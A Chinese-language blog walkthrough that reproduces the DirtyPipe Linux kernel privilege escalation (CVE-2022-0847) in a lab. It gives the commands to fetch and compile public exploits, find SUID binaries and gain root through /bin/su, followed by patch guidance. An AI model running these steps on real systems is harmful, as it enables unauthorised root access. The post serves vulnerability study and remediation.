前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

漏洞复现 | DirtyPipe CVE-2022-0847 Linux 内核提权漏洞复现

作者头像
TeamsSix
发布2022-09-20 16:59:13
3.1K0
发布2022-09-20 16:59:13
举报
文章被收录于专栏:TeamsSix的网络空间安全专栏

0x00 前言

CVSS 评分:7.8

影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

RT 通过 CVE-2022-0847 可覆盖重写任意可读文件中的数据,可将普通权限的用户提升到特权 root

这个漏洞作者将其命名为了 Dirty Pipe,一看到这名字讲道理就让人想到了 Dirty Cow,这是因为该漏洞的原理比较类似于 Dirty Cow,但这个漏洞更容易被利用。

0x01 漏洞检测

检测的方法很简单,直接 uname -r ,如果 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102 说明可能受到该漏洞的影响。

0x02 环境搭建

建议在搭建环境前,先打好快照

环境依赖:

  • Ubuntu 16.04 或 18.04(推荐)
  • Python >= 3.6 (不支持Python 2.x!)
  • pip3
代码语言:javascript
复制
git clone https://github.com/brant-ruan/metarget.git
cd metarget/
pip3 install -r requirements.txt
sudo ./metarget cnv install cve-2022-0847

环境搭建好后,查看当前系统内核

代码语言:javascript
复制
uname -r

可以看到系统内核已经是 5.8 的了,说明是可能受到该漏洞的影响了。

0x03 漏洞复现

方法一:CVE-2022-0847-DirtyPipe-Exploit

把 POC git 下来

代码语言:javascript
复制
git clone https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
cd CVE-2022-0847-DirtyPipe-Exploit

开始提权

代码语言:javascript
复制
gcc exploit.c -o exploit
./exploit

我这里提示 su: must be run from a terminal,没提权成功。

根据作者的解释,他的电脑快没电了,所以暂时还没时间解决这个问题,这 ……

方法二:dirtypipez.c

后来看 p 牛说到了网上的其他 POC,下面这个 POC 测试了一下,是可以提权的

代码语言:javascript
复制
mkdir dirtypipez
cd dirtypipez
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o dirtypipez

这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权

使用以下命令可以找到这类文件

代码语言:javascript
复制
find / -perm -u=s -type f 2>/dev/null

这里就以 /bin/su 为例了,直接 ./dirtypipez 跟上具有 SUID 权限的文件即可提权

代码语言:javascript
复制
./dirtypipez /bin/su

0x04 漏洞修复

更新升级 Linux 内核到以下安全版本:

  • Linux 内核 >= 5.16.11
  • Linux 内核 >= 5.15.25
  • Linux 内核 >= 5.10.102

往期推荐

云安全 | 容器基础设施所面临的风险学习

云安全 | 云原生安全是什么?

一键创建隐藏账号

原文链接: https://teamssix.com/220308-120008.html 参考文章: https://t.zsxq.com/imaqj2V https://mp.weixin.qq.com/s/b8DmtIerXuoC7f3nqaOVIw https://access.redhat.com/security/cve/cve-2022-0847

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-03-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 TeamsSix 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 前言
  • 0x01 漏洞检测
  • 0x02 环境搭建
  • 0x03 漏洞复现
    • 方法一:CVE-2022-0847-DirtyPipe-Exploit
      • 方法二:dirtypipez.c
      • 0x04 漏洞修复
      相关产品与服务
      容器服务
      腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档